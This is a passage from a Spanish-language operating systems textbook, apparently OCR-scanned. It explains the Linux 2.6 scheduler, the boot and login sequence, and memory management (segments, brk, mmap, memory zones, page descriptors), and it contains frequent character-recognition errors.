circular de tiempo real, Linux asocia los valores de los quantums de tiempo para cada uno de los 
niveles de prioridad que no son de tiempo real. El quantum es el número de pulsos de reloj duran¬ 
te los que el hilo puede ejecutarse. En la versión actual de Linux, el reloj opera a 1000 FIz y cada 
pulso es de 1 ms, a lo cual se le conoce como jiffy. 


SECCION 10.3 


LOS PROCESOS EN LINUX 


753 


Al igual que la mayoría de los sistemas UNIX, Linux asocia un buen valor con cada hilo. El 
predeterminado es 0, pero se puede modificar si utilizamos la llamada al sistema nice(vaior), don¬ 
de el valor puede estar entre -20 y -1-19. Este valor determina la prioridad estática de cada hilo. Un 
usuario, que calculara 7t a mil millones de posiciones decimales en segundo plano, podría poner es¬ 
ta llamada en su programa para no causar problemas a los otros usuarios. Sólo el administrador del 
sistema puede pedir un servicio mejor que el normal (valores de -20 a -1). Dejamos al lector el 
trabajo de deducir la razón de esta regla. 

El planificador de Linux utiliza una estructura de datos clave, conocida como cola deqecu- 
ción (runquaje). Una cola de ejecución está asociada con cada CPU en el sistema, y mantiene (en¬ 
tre otra información) dos arreglos: activas y expiradas. Como se muestra en la figura 10-10, cada 
uno de estos campos es un apuntador a un arreglo de 140 cabezas de listas, cada una de las cuales 
corresponde a una prioridad distinta. La cabeza de lista apunta a una lista doblemente enlazada de 
procesos con una prioridad específica. La operación básica del planificador se puede describir de la 
siguiente manera. 


Cola de ejecución por CPU 



Prioridad 0 


Prioridad 0 


Prioridad 139 


Figura 10-10. Ilustración de la estructura cola de ejecución de Linux y los arreglos de 
prioridad. 


El planificador selecciona una tarea del arreglo activo de mayor prioridad. Si expira la ranu¬ 
ra de tiempo (quantum) de esa tarea, se pasa a una lista de tareas expiradas (que puede estar en un 
nivel de prioridad distinto). Si la tarea se bloquea (por ejemplo, para esperar un evento de E/S) an¬ 
tes de que expire su ranura de tiempo, una vez que ocurra el evento y se pueda reanudar su ejecu¬ 
ción, se coloca de vuelta en el arreglo de tareas activas y su ranura de tiempo se disminuye para 
reflejar el tiempo de la CPU que ya consumió. Una vez que se agote por completo su ranura de 
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tiempo, también se coiocará en un arregio de tareas expiradas. Cuando no haya más tareas en nin¬ 
guno de ios arregios de tareas activas, ei pianificador simpiemente intercambiará ios apuntadores 
de manera que ios arregios de tareas expiradas se conviertan en arregios de tareas activas, y vice¬ 
versa. Este método asegura que ias tareas de menor prioridad no sufran de inanición (excepto 
cuando ios hiios de pianificación PIFO en tiempo reai acaparen ia CPU por compieto, io cuai es 
improbabie). 

A ios distintos niveies de prioridad se Íes asignan distintos vaiores para ia ranura de tiempo. Li¬ 
nux asigna quantums más aitos a ios procesos de mayor prioridad. Por ejempio, ias tareas que se 
ejecutan en ei nivei de prioridad 100 recibirán quantums de 800 mseg, mientras que ias tareas en ei 
nivei de prioridad 139 recibirán 5 mseg. 

La idea detrás de este esquema es sacar a ios procesos dei kernei con rapidez. Si un proceso 
trata de ieer un archivo dei disco, su veiocidad se reducirá en forma considerabie si hacemos que 
espere un segundo entre cada iiamada a nead. Es mucho mejor dejar que se ejecute justo después 
de que se compiete cada petición, para que pueda reaiizar ia siguiente iiamada con rapidez. De ma¬ 
nera simiiar, si un proceso se bioquea ai esperar entrada dei teciado, es sin duda un proceso interac¬ 
tivo y como tai debe recibir una prioridad aita tan pronto como esté iisto, para asegurar que ios 
procesos interactivos obtengan un buen servicio. En este sentido, ios procesos i i gados a ia CPU ob¬ 
tienen básicamente cuaiquier servicio sobrante cuando se bioquean todos ios procesos iigados a E/S 
e interactivos. 

Como Linux no sabe a priori si una tarea está iigada a ia E/S o a ia CPU (tampoco ei resto de 
ios SO io saben), se basa en ei mantenimiento continuo de heurísticas de interactividad. De esta for¬ 
ma, Linux hace ia diferencia entre ia prioridad estática y ia dinámica. La prioridad dinámica de ios 
hiios se tiene que voiver a caicuiar de manera continua, para 1) recompensar a ios hiios interacti¬ 
vos y 2) castigar a ios hiios que acaparan ia CPU. Ei bono de prioridad máximo es -5, ya que ios 
vaiores de menor prioridad corresponden a ia prioridad más aita que recibe ei pianificador. Ei cas¬ 
tigo de prioridad máximo es -1-5. 

Dicho en forma más específica, ei pianificador mantiene una variabie iiamada sieep_avg aso¬ 
ciada con cada tarea. Cada vez que despierta una tarea esta variabie se incrementa: cada vez que se 
reempiaza una tarea o cuando expira su quantum, esta variabie se decrementa con base en ei vaior 
correspondiente. Este vaior se utiiiza para asignar en forma dinámica ei bono de ia tarea con vaio¬ 
res desde -5 a -1-5. Ei pianificador de Linux vueive a caicuiar ei nuevo nivei de prioridad, a medi¬ 
da que un hiio avanza de ia iista de tareas activas a ia iista de tareas expiradas. 

Ei aigoritmo de pianificación descrito en esta sección se refiere ai kernei 2.6, y se introdujo por 
primera vez en ei kernei 2.5 inestabie. Los primeros aigoritmos exhibían un rendimiento pobre en 
entornos muitiprocesadory no escaiaban bien cuando aumentaba ei número de tareas. Como ia des¬ 
cripción que presentamos en ios párrafos anteriores indica que se puede reaiizar una decisión de pia¬ 
nificación por medio dei acceso a ia iista apropiada de tareas activas, se puede reaiizar en un tiempo 
0(1) constante, sin importar ei número de procesos en ei sistema. 

Además, ei pianificador inciuye características especiaimente útiies para ias piataformas mui- 
tiprocesador o muitinúcieo. En primer iugar, ia estructura coia de ejecución se asocia con cada CPU 
en ia piataforma muitiprocesador. Ei pianificador trata de mantener ios beneficios de ia pianifica¬ 
ción por afinidad, y depianificar ias tareas en ia CPU en ia que se ejecutaban antes. En segundo iu¬ 
gar, hay un conjunto de iiamadas ai sistema disponibies para especificar o modificar aún más ios 
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requerimientos de afinidad de un hiio seieccionado. Por úitimo, ei pianificador reaiiza un baianceo 
de cargas periódico entre ias estructuras coia de ejecución de distintas CPUs, para asegurar que ia 
carga dei sistema esté bien baianceada, ai tiempo que cumpie con ciertos requerimientos de rendi¬ 
miento o afinidad. 

Ei pianificador considera sóio ias tareas ejecutabies, ias cuaies son coiocadas en ia estructura 
de coia de ejecución apropiada. Las tareas que no son ejecutabies y están en espera de varias ope¬ 
raciones de E/S u otros eventos dei kernei se coiocan en otra estructura de datos conocida como co¬ 
la en espera (waitqueue). Se asocia una estructura coia en espera con cada evento que ias tareas 
puedan estar esperando. La cabeza de ia coia de espera inciuye un apuntador a una iista eniazada 
de tareas y una espera activa. Esta espera activa es necesaria para asegurar que ia estructura coia en 
espera se pueda manipuiar de manera concurrente a través dei código principai dei kernei y de ios 
manejadores de interrupciones, o de otras invocaciones asincronas. 

De hecho, ei código dei kernei contiene variabies de sincronización en muchas ubicaciones. 
Los primeros kerneis de Linux tenían sóio un gran bloqueo del kernei (BLK), que resuitó muy 
ineficiente, en especiai en ias piataformas muitiprocesador, debido a que evitaba que ios procesos 
en distintas CPUs ejecutaran ei código dei kernei en forma concurrente. Por ende, se introdujeron 
muchos puntos de sincronización nuevos con niveies de detaiie más finos. 


10.3.5 Arranque de Linux 

Los detaiies varían de una piataforma a otra, pero en generai ios siguientes pasos representan ei pro¬ 
ceso de arranque (booteo). Cuando inicia ia computadora, ei BIOS realiza la A uto prueba de encen¬ 
dido (POST) junto con el descubrimiento e inicialización de los dispositivos iniciales, ya que el 
proceso de inicio del SO puede requerir el acceso a los discos, pantallas, teclados, etcétera. A con¬ 
tinuación se lee el primer sector del disco de inicio, el M BR (M áster Boot Record, Registro maes¬ 
tro de inicio), se coloca en una ubicación de memoria fija y se ejecuta. Este sector contiene un 
pequeño programa (512 bytes) que carga un programa independiente llamado boot del dispositivo de 
inicio, que por lo general es un disco IDE o SCSI. El programa boot primero se copia a sí mismo en 
una dirección libre de la parte superior de la memoria, para liberar la parte inferior de la memoria 
para el sistema operativo. 

U na vez que se traslada, boot lee el directorio raíz del dispositivo de inicio. Para ello debe com¬ 
prender el sistema de archivos y el formato de los directorios, lo cual es el caso con algunos carga¬ 
dores de inicio como GRUB (GRand Unified Bootloader, Gran cargador de inicio unificado). 
Otros cargadores de inicio populares (como LILO de Intel) no se basan en un sistema de archivos 
específico. En vez de ello requieren un mapa de bloques y direcciones de nivel inferior, que descri¬ 
ben los sectores físicos, las cabezas y los cilindros, para buscar los sectores relevantes que se van a 
cargar. 

Después boot lee el kernei del sistema operativo, lo coloca en memoria y salta a él. En este pun¬ 
to termina su trabajo y el kernei está en ejecución. 

El código de inicio del kernei está escrito en lenguaje ensamblador, y es muy dependiente de 
la máquina. El trabajo típico consiste en establecer la pila del kernei, identificar el tipo de CPU, 
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calcular la cantidad de RAM presente, deshabilitar interrupciones, habilitar la M M U y por últi¬ 
mo, llamar al procedimiento main en lenguaje C para que inicie la parte principal del sistema ope¬ 
rativo. 

El código de C también tiene una inicialización considerable, pero es más lógica que física. 
Empieza por asignar un búfer de mensajes para ayudar a depurar los problemas en el inicio. A me¬ 
dida que procede la inicialización, aquí se escriben mensajes sobre lo que está ocurriendo, de ma¬ 
nera que se puedan extraer después de una falla de inicio mediante un programa especial de 
diagnóstico. Considere esto como la grabadora de vuelo de la cabina del sistema operativo (la caja 
negra que buscan los investigadores cuando se estrella un avión). 

Después se asignan las estructuras de datos del kernel. La mayoría son de tamaño fijo, pero 
unas cuantas (como la caché de páginas y ciertas estructuras de tablas de páginas) dependen de la 
cantidad de RAM disponible. 

En este punto, el sistema empieza la autoconfiguración. M ediante el uso de archivos de confi¬ 
guración que indican los tipos de dispositivos de E/S que podrían estar presentes, empieza a son¬ 
dear los dispositivos para ver cuáles están presentes en realidad. Si al sondear un dispositivo éste 
responde, se agrega a una tabla de dispositivos conectados. Si no responde, se asume que está au¬ 
sente y se ignora de ese punto en adelante. A diferencia de las versiones de U NIX tradicionales, los 
drivers de dispositivos de Linux no necesitan tener vínculos estáticos y se pueden cargar en forma 
dinámica (como en todas las versiones de M S-DOS y Windows). 

Los argumentos a favor y en contra de la carga dinámica de drivers son interesantes y vale la 
pena mencionarlos. El principal argumento en contra de la carga dinámica es la seguridad. Si usted 
opera un sitio seguro, como la base de datos de un banco o un servidor Web corporativo, tal vez 
quiera evitar que alguien inserte código aleatorio en el kernel. El administrador del sistema puede 
mantener los archivos de código fuente y de código objeto del sistema operativo en una máquina 
segura, realizar toda la construcción del sistema ahí y enviar el binario del kernel a otras máquinas 
a través de una red de área local. Si los drivers no se pueden cargar en forma dinámica, este esce¬ 
nario evita que los operadores de la máquina y otros que conozcan la contraseña de superusuario 
inyecten código malicioso o con errores en el kernel. Además, en lugares extensos se conoce la con¬ 
figuración del hardware exactamente a la hora en que se compila y vincula el sistema. Los cambios 
son tan raros, que tener que volver a vincular el sistema al agregar un nuevo dispositivo de hardwa¬ 
re no es un problema. 

U na vez que se ha configurado todo el hardware, lo siguiente es crear en forma manual y con 
cuidado el proceso 0, establecer su pila y ejecutarlo. El proceso 0 continúa la inicialización y reali¬ 
za actividades como programar el reloj en tiempo real, montar el sistema de archivos raíz, crear init 
(proceso 1) y el demonio de paginación (proceso 2). 

Init comprueba sus banderas para ver si debe usar el modo de un solo usuario o de multiu- 
suario. En el primer caso, bifurca un proceso que ejecuta el shell y espera a que este proceso ter¬ 
mine. En el segundo caso, bifurca un proceso que ejecuta la secuencia de comandos del shell de 
inicialización del sistema (/etc/rc), el cual puede realizar comprobaciones de consistencia, mon¬ 
tar sistemas de archivos adicionales, iniciar procesos de demonios, etcétera. Después lee/etc/ttys, 
que lista las terminales y algunas de sus propiedades. Para cada terminal habilitada bifurca una 
copia de sí mismo, que realiza ciertas labores de mantenimiento y después ejecuta un programa 
llamado getty. 
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Este programa establece la velocidad de línea y otras propiedades para cada línea (alguna de 
las cuales pueden ser módems, por ejemplo) y luego escribe 

login: 

en la pantalla de la terminal, donde trata de leer el nombre del usuario del teclado. Cuando alguien 
se sienta en la terminal y proporciona un nombre de inicio de sesión, getty termina al ejecutar/bin- 
/login, el programa de inicio de sesión. Después, login pide una contraseña, la cifra y la compara 
con la contraseña cifrada que está almacenada en el archivo de contraseñas, /etc/passwd. Si es co¬ 
rrecta, login se reemplaza a sí mismo con el shell del usuario, que después espera el primer coman¬ 
do. Si es incorrecta, login pide otro nombre de usuario. Este mecanismo se muestra en la figura 
10-11 para un sistema con tres terminales. 



Figura 10-11. La secuencia de procesos utilizados para iniciar ciertos sistemas Linux. 


En la figura, el proceso getty que se ejecuta para la terminal 0 sigue esperando la entrada. En 
la terminal 1, un usuario ha escrito un nombre de inicio de sesión, por lo que getty se sobrescribió 
con login, que está pidiendo la contraseña. En la terminal 2 ya ocurrió un inicio de sesión exitoso, 
y el Shell imprimió el indicador (%). Después el usuario escribió 

cp f1 f2 

con lo cual el shell bifurca un proceso hijo y hace que éste ejecute el programa cp. El shell se blo¬ 
quea en espera de que el hijo termine, momento en el cual escribirá otro indicador para esperar la 
entrada del teclado. Si el usuario en la terminal 2 hubiera escrito cc en vez de cp, se hubiera inicia¬ 
do el programa principal del compilador de C, que a su vez hubiera bifurcado más procesos para 
ejecutar las diversas pasadas del compilador. 
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10.4 ADMINISTRACIÓN DE LA MEMORIA EN LINUX 

El modelo de memoria de Linux es simpie, para que ios programas sean portátiies y se pueda im- 
piementar Linux en máquinas con unidades de administración de memoria que tengan ampiias di¬ 
ferencias, desde casi nada (por ejempio, ia IBM PC original) hasta el hardware de paginación 
sofisticado. Ésta es un área del diseño que ha cambiado muy poco en décadas. Ha funcionado bien, 
por lo que no ha necesitado mucha revisión. Ahora examinaremos el modelo y la forma en que se 
i mpl ementa. 

10.4.1 C onceptos fundamentales 

Todo proceso en Linux tiene un espacio de direcciones que consiste lógicamente en tres segmen¬ 
tos: texto, datos y pila. En la figura 10-12(a) se muestra un espacio de direcciones de un proceso de 
ejemplo, como el proceso A. El segmento de texto contiene las instrucciones de máquina que for¬ 
man el código ejecutable del programa. Es producido por el compilador y el ensamblador al tradu¬ 
cir el programa de C, C-i-i- u otro lenguaje en código máquina. Por lo general, el segmento de texto 
es de sólo lectura. Los programas automodificables quedaron fuera de estilo allá por 1950, debido 
a que era muy difícil comprenderlos y depurarlos. Por lo tanto, el segmento de texto no aumenta ni 
disminuye, ni cambia de cualquier otra forma. 


Apuntador 
de la pila 


Proceso A 


20K 

8K 

0 


Datos 


Texto 


(a) 


Memoria física 


Proceso B 



BSS 
' Patos"' 


Texto 


(c) 


■ Apuntador 
de la pila 


24K 

8K 

OK 


Figura 10-12. (a) Espacio de direcciones virtuales del proceso A. (b) M emoria física, 
(c) Espacio de direcciones virtuales del proceso B. 


El segmento de datos contiene almacenamiento para todas las variables del programa, cade¬ 
nas, arreglos y demás datos. Tiene dos partes, losdatosinicializadosy los datos sin inicializar. Por 
cuestiones históricas, estos últimos ti pos de datos se conocen como el BSS (conocido históricamen¬ 
te como Bloque iniciado mediante un símbolo). La parte inicializada del segmento de datos con- 
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tiene variables y constantes del compilador que necesitan un valor inicial cuando empieza el pro¬ 
grama. Todas las variables en la parte del BSS se inicializan con cero después de cargarlas. 

Por ejemplo, en C es posible declarar una cadena de caracteres e inicializarla al mismo tiem¬ 
po. Cuando inicia el programa, éste espera que la cadena tenga su valor inicial. Para implementar 
esta construcción, el compilador asigna a la cadena una ubicación en el espacio de direcciones, y 
asegura que cuando se inicie el programa esta ubicación contenga la cadena apropiada. Desde el 
punto de vista del sistema operativo, los datos inicializados no son tan distintos del texto del pro¬ 
grama: ambos contienen patrones de bits producidos por el compilador, que se deben cargar en me¬ 
moria al iniciarse el programa. 

La existencia de datos sin inicializar es en realidad sólo una optimización. Cuando una variable 
global no se inicializa en forma explícita, la semántica del lenguaje C indica que su valor inicial es 
0. En la práctica, la mayoría de las variables globales no se inicializan de manera explícita, y por con¬ 
secuencia son 0. Para implementar esto sólo se necesita que una sección del archivo binario ejecuta¬ 
ble sea exactamente igual al número de bytes de datos, y se inicializan todos ellos, incluyendo los 
que tengan el valor predeterminado de 0. 

Sin embargo, para ahorrar espacio en el archivo ejecutable, esto no se lleva a cabo. En vez de 
ello, el archivo contiene todas las variables inicializadas de manera explícita después del texto del 
programa. Las variables sin inicializar se recopilan en conjunto después de las inicializadas, por lo 
que todo lo que el compilador necesita es colocar una palabra en el encabezado, que indique cuán¬ 
tos bytes hay que asignar. 

Para que este punto sea más explícito, considere la figura 10-12(a) de nuevo. Aquí el texto del 
programa es de 8 KB y los datos inicializados son también de8 KB. Los datos sin inicializar (BSS) 
son de4 KB. El archivo ejecutable sólo es de 16 KB (texto -i-datos inicializados), más un encabe¬ 
zado corto que indica al sistema queasigneotros4 KB después de los datos inicializados, y les asig¬ 
ne 0 antes de iniciar el programa. Este truco evita tener que almacenar 4 KB de ceros en el archivo 
ejecutable. 

Para poder evita la asignación de un marco de página física lleno de ceros, durante la iniciali- 
zación Linux asigna una página cero estática, una página protegida contra escritura llena de ceros. 
Cuando se carga un proceso, su región de datos sin inicializar se establece para apuntar a la página 
cero. Cada vez que un proceso intenta escribir en esta área, entra en acción el mecanismo de copia 
al escribir, y se asigna un marco de página real al proceso. 

A diferencia del segmento de texto, que no puede cambiar, el segmento de datos sí puede cam¬ 
biar. Los programas modifican sus variables todo el tiempo. Además, muchos programas necesitan 
asignar espacio en forma dinámica, durante la ejecución. Para manejar esto, Linux permite que el 
segmento de datos crezca y se reduzca a medida que se asigna y desasigna memoria. Hay una lla¬ 
mada al sistema (brk) disponible para permitir que un programa establezca el tamaño de su segmen¬ 
to de datos. A sí, para asignar más memoria, un programa puede aumentar el tamaño de su segmento 
de datos. El procedimiento malloc de la biblioteca de C, que se utilizaba con frecuencia para asig¬ 
nar memoria, hace un uso intensivo de esta llamada al sistema. El descriptor del espacio de direc¬ 
ciones del proceso contiene información sobre el rango de las áreas de memoria que se asignan en 
forma dinámica en el proceso, al que por lo general se le conoce como montículo. 

El tercer segmento es el segmento de pila. En la mayoría de las máquinas, empieza en (o cer¬ 
ca de) la parte superior del espacio dedirecciones virtual es y crece hacia abajo, hasta llegar a 0. Por 
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ejemplo, en las plataformas x86 de 32 bits la pila empieza en la dirección OxCOOOOOOO, que es el 
límite de direcciones virtuales de3 GB visible para el proceso en modo de usuario. Si la pila crece 
más allá de la parte inferior del segmento de pila, se produce un fallo del hardware y el sistema ope¬ 
rativo baja la parte inferior del segmento de la pila por una página. Los programas no administran 
de manera explícita el tamaño del segmento de la pila. 

Cuando se inicia un programa, su pila no está vacía. En vez de ello, contiene todas las variables 
de entorno (shell) así como la línea de comandos que se escribió en el shell para invocarlo. De esta 
forma, un programa puede descubrir sus argumentos. Por ejemplo, cuando se escribe el comando 

cp orig dest 

se ejecuta el programa cp con la cadena "cp orig dest" en la pila, para que pueda averiguar los nom¬ 
bres de los archivos de origen y destino. La cadena se representa como un arreglo de apuntadores 
a los símbolos en la cadena, para facilitar el análisis sintáctico. 

Cuando dos usuarios ejecutan el mismo programa (como el editor), debe ser posible (pero ine¬ 
ficiente) mantener dos copias del texto del programa del editor en la memoria al mismo tiempo. En 
vez de ello, la mayoría de los sistemas Linux aceptan segmentos de texto compartidos. En las fi¬ 
guras 10-12(a) y 10-12(c) podemos ver dos procesos (A y B) que tienen el mismo segmento de tex¬ 
to. En la figura 10-12(b) podemos ver una posible distribución de la memoria física, en la cual 
ambos procesos comparten la misma pieza de texto. La asignación se realiza mediante el hardware 
de memoria virtual. 

Los segmentos de datos y de la pila nunca se comparten, excepto después de una llamada a 
fork, y sólo las páginas que no se modifican. Si alguna de ellas necesita crecer y no hay espacio ad¬ 
yacente para que pueda hacerlo, no hay problema ya que las páginas virtuales adyacentes no se tie¬ 
nen que asignar a páginas físicas adyacentes. 

En algunas computadoras, el hardware proporciona espacios de direcciones separados para las 
instrucciones y los datos. Cuando esta característica está disponible, Linux la puede utilizar. Por 
ejemplo, si en una computadora con direcciones de 32 bits la característica está disponible, habría 
iP- bits de espacio de direcciones para instrucciones y P bits adicionales de espacio de direccio¬ 
nes para que los segmentos de datos y de la pila los puedan compartir. Un salto a 0 pasa a la direc¬ 
ción 0 del espacio de texto, mientas que un movimiento desde 0 utiliza la dirección 0 en el espacio 
de datos. Esta característica duplica el espacio de direcciones disponible. 

Además de asignar más memoria en forma dinámica, los procesos en Linux pueden acceder a 
los datos de los archivos por medio de archivos de mapeo de memoria. Esta característica hace 
posible la asignación de un archivo a una porción del espacio de direcciones de un proceso, de ma¬ 
nera que se pueda leer y escribir en el archivo como si fuera un arreglo de bytes en la memoria. Al 
asignar un archivo se facilita el acceso aleatorio al mismo, en vez de tener que utilizar llamadas al 
sistema de E/S como read y write. Para acceder a las bibliotecas compartidas, éstas se asignan me¬ 
diante el uso de este mecanismo. En la figura 10-13 podemos ver un archivo que se asigna a dos 
procesos al mismo tiempo, en distintas direcciones virtuales. 

U na ventaja adicional de asignar un archivo es que dos o más procesos pueden asignar el mis¬ 
mo archivo al mismo tiempo. Las escrituras que cualquiera de los procesos realicen en el archivo 
serán visibles para los otros de manera instantánea. De hecho, al asignar un archivo reutilizable(que 
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Proceso A Memoria física Proceso B 



Figura 10-13. Dos procesos pueden compartir un archivo asignado. 

se descartará una vez que terminen todos los procesos), este mecanismo provee un alto ancho de 
banda para que varios procesos puedan compartir la memoria. En el caso más extremo, dos (o más) 
procesos podrían asignar un archivo que cubra todo el espacio de direcciones, con lo cual se obtie¬ 
ne una forma de compartición que en parte está entre los procesos e hilos separados. Aquí, el espa¬ 
cio de dirección se comparte (al igual que con los hilos), pero cada proceso mantiene sus propios 
archivos abiertos y señales, por ejemplo, lo cual no es como con los hilos. Sin embargo, en la prác¬ 
tica nunca tratamos de hacer que dos espacios de direcciones correspondan exactamente. 

10.4.2 Llamadas al sistema de administración de memoria en Linux 

POSIX no especifica llamadas al sistema para la administración de la memoria. Este tema se con¬ 
sideraba demasiado dependiente de la máquina como para estandarizarlo. En vez de ello, se ocultó 
al decir que los programas que requieren la administración dinámica de la memoria pueden utilizar 
el procedimiento de biblioteca malloc (definido por el estándar ANSI C). La forma en que se im- 
plementa malloc está por lo tanto fuera del estándar POSIX. En algunos círculos, esta metodología 
se conoce como "pasar la cubeta". 

En la práctica, la mayoría de los sistemas Linux tienen llamadas al sistema para administrar la 
memoria. Las más comunes se listan en la figura 10-14. Brk especifica el tamaño del segmento de 
datos al proporcionar la dirección del primer byte después de ella. Si el nuevo valor es mayor que 
el anterior, el segmento de datos se hace más grande: en caso contrario se reduce. 

Las llamadas al sistema mmap y munmap controlan los archivos mapeados en la memoria. El 
primer parámetro para mmap (direc) determina la dirección en la que se asigna el archivo (o la por¬ 
ción correspondiente). Debe ser un múltiplo del tamaño de la página. Si este parámetro es 0, el sis¬ 
tema determina la dirección por sí mismo y la devuelve en a. El segundo parámetro (Ion) indica 
cuántos bytes se deben asignar. También debe ser un múltiplo del tamaño déla página. El tercer pa¬ 
rámetro (prot) determina la protección para el archivo asignado. Se puede marcar como de lectura. 
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Llamada al sistema 

Descripción 

s = brk(direc) 

Cambia el tamaño del segmento de datos 

a = mmap(direc, Ion, prot, banderas, fd, despi) 

Asigna un archivo 

s = unmap{direc, Ion) 

Desasigna un archivo 


Figura 10-14. Algunas llamadas al sistema relacionadas con la administración de la 
memoria. El código de retorno s es -1 si ocurrió un error; a y direc son direcciones 
de memoria, Ion es una longitud, prot controla la protección, banderas son bits misce¬ 
láneos, fd es un descriptor de archivos y despi es un desplazamiento de archivo. 

escritura, ejecutable o alguna combinación de estos permisos. El cuarto parámetro (banderas) con¬ 
trola si el archivo es privado o se puede compartir, y si direc es un requerimiento o sólo una suge¬ 
rencia. El quinto parámetro (fd) es el descriptor para el archivo que se va a asignar. Sólo se pueden 
asignar los archivos abiertos, por lo que para asignar un archivo primero hay que abrirlo. Por últi¬ 
mo, despi indica en qué parte del archivo se va a iniciar la asignación. No es necesario empezar la 
asignación en el byte 0; bastará con cualquier límite de página. 

La otra llamada (unmap) elimina un archivo asignado. Si sólo se desasigna una porción del ar¬ 
chivo el resto permanece asignado. 

10.4.3 Implementación de la administración de la memoria en Linux 

Cada proceso de Linux en una máquina de 32 bits obtiene por lo general 3 GB de espacio de direccio¬ 
nes virtuales para sí mismo, donde 1GB restante se reserva para sus tablas de páginas y otros datos del 
kernel. El gigabyte del kernel no está visible cuando el proceso se ejecuta en modo de usuario, pero se 
vuelve accesible cuando el proceso se atrapa en el kernel. Por lo general, la memoria del kernel reside 
en la memoria física inferior, pero se asigna en el gigabyte superior del espacio de direcciones virtua¬ 
les de cada proceso, entre las direcciones OxCOOOOOOO y OxFFFFFFFF (3 a 4 GB). El espacio de 
direcciones se crea al momento de crear el proceso y se sobrescribe en una llamada al sistema exec. 

Para poder permitir que varios procesos compartan la memoria física subyacente, Linux moni- 
torea el uso de la memoria física, asigna más memoria según lo requieran los procesos de usuario 
o los componentes del kernel, asigna en forma dinámica las porciones de la memoria física en el es¬ 
pacio de direcciones de distintos procesos, saca y mete de la memoria los archivos ejecutables del 
programa, los otros archivos y demás información sobre el estado según sea necesario para utilizar 
con eficiencia los recursos de la plataforma y asegurar el progreso de la ejecución. En el resto del 
capítulo analizaremos la implementación de varios mecanismos en el kernel de Linux que son res¬ 
ponsables de estas operaciones. 

Administración de ia memoria física 

Debido a las limitaciones idiosincrásicas del hardware en muchos sistemas, no toda la memoria fí¬ 
sica se puede tratar de la misma forma, en especial con respecto a la E/S y la memoria virtual. Li¬ 
nux trabaja con tres zonas de memoria: 
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1. ZONE_DMA: páginas que se pueden utilizar para operaciones de DM A. 

2. ZONE_NORM AL : páginas normales que se asignan de la manera usual. 

3. ZONE_HIGHMEM : páginas con direcciones de memoria superior, que no se asignan de 
manera permanente. 

Los límites exactos y la distribución de las zonas de memoria dependen de la arquitectura. En el 
hardware x86, ciertos dispositivos pueden realizar operaciones de DMA sólo en los primeros 16 
M B del espacio de direcciones, por lo que ZONE_DMA se encuentra en el rango de 0 a 16 M B. 
Además, el hardware no puede asignar en forma directa las direcciones de memoria por encima de 
896 M B, por lo que ZONE_HIGHMEM se encuentra arriba de esta marca. ZONE_NORMAL es 
cualquier ubicación entre las dos zonas anteriores. Por lo tanto, en las plataformas x86 los prime¬ 
ros 896 M B del espacio de direcciones de Linux se asignan en forma directa, mientras que los 
128 M B restantes del espacio de direcciones del kernel se utilizan para acceder a las regiones de la 
memoria superior. El kernel mantiene una estructura de zona para cada una de las tres zonas y pue¬ 
de realizar asignaciones de memoria para las tres zonas por separado. 

La memoria principal en Linux consiste en tres partes. Las primeras dos partes (kernel y mapa 
de memoria) están residentes (fijadas) en la memoria (es decir, nunca se paginan hacia fuera de és¬ 
ta, por lo que se dice también que están residentes). El resto de la memoria se divide en marcos de 
página, cada uno de los cuales puede contener una página de texto, datos o de la pila, una página 
de la tabla de páginas, o puede estar en la lista libre. 

El kernel mantiene un mapa de la memoria principal, el cual contiene toda la información so¬ 
bre el uso de la memoria física en el sistema, como sus zonas, los marcos de página libres, etcéte¬ 
ra. Esta información, que se ilustra en la figura 10-15, se organiza de la siguiente manera. 

En primer lugar, Linux mantiene un arreglo de descriptores de páginas, de tipo página para 
cada marco de página física en el sistema, conocido como mem_map. Cada descriptor de página 
contiene un apuntador al espacio de direcciones al que pertenece, en caso de que la página no esté 
libre, un par de apuntadores que le permitan formar listas doblemente enlazadas con otros descrip¬ 
tores, por ejemplo para mantener juntos todos los marcos de página libres, y unos cuantos campos 
más. En la figura 10-15, el descriptor para la página 150 contiene una asignación al espacio de di¬ 
recciones al que pertenece la página. Las páginas 70, 80 y 200 están libres, y enlazadas entre sí. El 
tamaño del descriptor de página es de 32 bytes, por lo que el [iie[ii_[iiap completo puede consumir me¬ 
nos de 1% de la memoria física (para un marco de página de 4 K B). 

Como la memoria física se divide en zonas, Linux mantiene un descriptor de zona para cada 
una de ellas. El descriptor de zona contiene información sobre el uso de la memoria dentro de ca¬ 
da zona, como el número de páginas activas o inactivas, las marcas de agua superior e inferior que 
debe utilizar el algoritmo de reemplazo de página que veremos más adelante en este capítulo, y mu¬ 
chos otros campos más. 

Además, un descriptor de zona contiene un arreglo de áreas libres. El i-ésimo elemento en este 
arreglo identifica el primer descriptor de página del primer bloque de 2' páginas libres. Como puede 
haber varios bloques de 2' páginas libres, Linux utiliza el par de apuntadores de descriptores de pá¬ 
gina en cada elemento page para enlazarlos entre sí. Esta información se utiliza en las operaciones 
de asignación de memoria que Linux proporciona. En lafigura 10-15 se muestra area_iibre[o], que 
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Mem map: arreglo de 
descriptores de páginas 



node descriptor 


Figura 10-15. Representación de la memoria principal de Linux. 

identifica todas las áreas libres de la memoria principal que consistan sólo de un marco de página (ya 
que 2° es uno), y apunta a la página 70, la primera de las tres áreas libres. Se puede llegar a los otros 
bloques libres de tamaño uno por medio de los enlaces en cada uno de los descriptores de página. 

Por último, como Linux se puede portar a las arquitecturas NUM A (donde las distintas direc¬ 
ciones de memoria tienen distintos tiempos de acceso), para diferenciar entre la memoria física en 
distintos nodos (y evitar asignar estructuras de datos entre nodos), se utiliza un descriptor de nodo. 
Cada descriptor de nodo contiene información sobre el uso de la memoria y las zonas en ese nodo 
específico. En las plataformas UMA, Linux describe toda la memoria a través de un descriptor de 
nodo. Los primeros bits dentro de cada descriptor de página se utilizan para identificar el nodo y la 
zona a los que pertenece el marco de página. 

Para que el mecanismo de paginación sea eficiente en las arquitecturas de 32 y 64 bits, Linux 
utiliza un esquema de paginación de cuatro niveles. Después de Linux 2.6.10 se expandió un esque¬ 
ma de paginación de tres niveles que se utilizó originalmente en el sistema de Alpha, y desde la ver¬ 
sión 2.6.11 se utiliza un esquema de paginación de cuatro niveles. Cada dirección virtual se divide 
en cinco campos, como se muestra en la figura 10-16. Los campos del directorio se utilizan como 
un índice para el directorio de página apropiado, del cual hay uno privado para cada proceso. El va- 
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lor que contiene es un apuntador a uno de los directorios de siguiente nivel, que se indexan de nue¬ 
vo mediante un campo de la dirección virtual. La entrada seleccionada en el directorio de la pági¬ 
na intermedia apunta a la tabla de páginas final, que se indexa mediante el campo de página de la 
